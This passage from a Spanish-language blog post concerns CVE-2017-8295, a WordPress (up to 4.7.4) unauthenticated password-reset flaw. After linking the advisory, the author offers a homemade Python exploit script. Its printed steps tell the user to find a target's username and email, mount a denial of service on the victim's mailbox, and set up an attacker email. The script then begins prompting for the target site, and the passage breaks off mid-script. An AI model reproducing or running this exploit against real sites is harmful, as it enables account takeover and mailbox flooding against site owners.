Entradas

Mostrando entradas de mayo, 2017

0-day: WordPress < 4.7.4 - Unauthorized Password Reset Vulnerability

Imagen
Hola Después de varios días de inactividad, llegó esta noticia: https://exploitbox.io/vuln/WordPress-Exploit-4-7-Unauth-Password-Reset-0day-CVE-2017-8295.html Se trata de una vulnerabilidad 0-day en todas las veriones  de Wordpress <= 4.7.4, que permite obtener el correo con el link para resetear la clave de un usuario, sin tener que estar autenticado. Para probar desarrollé este código, espero les sirva. #! /usr/bin/python import httplib, urllib import sys print(""" Wordpress exploit CVE-2017-8295 v1.0 - www.incode.cl 1. Obtener nombre de usuario de wordpress y su email 2. Generar DoS en email del usuario 3. Crear tu correo '[email protected]' Continuar con el exploit... """) url = raw_input("4. Ingresa la URL del Wordpress (ej: http://misitio.com) : ") if len(url) > 5: user = raw_input("5. Ingresa el nombre de usuario WP (ej: admin) : ") if len(user) <= 1: print ("Usuario invalido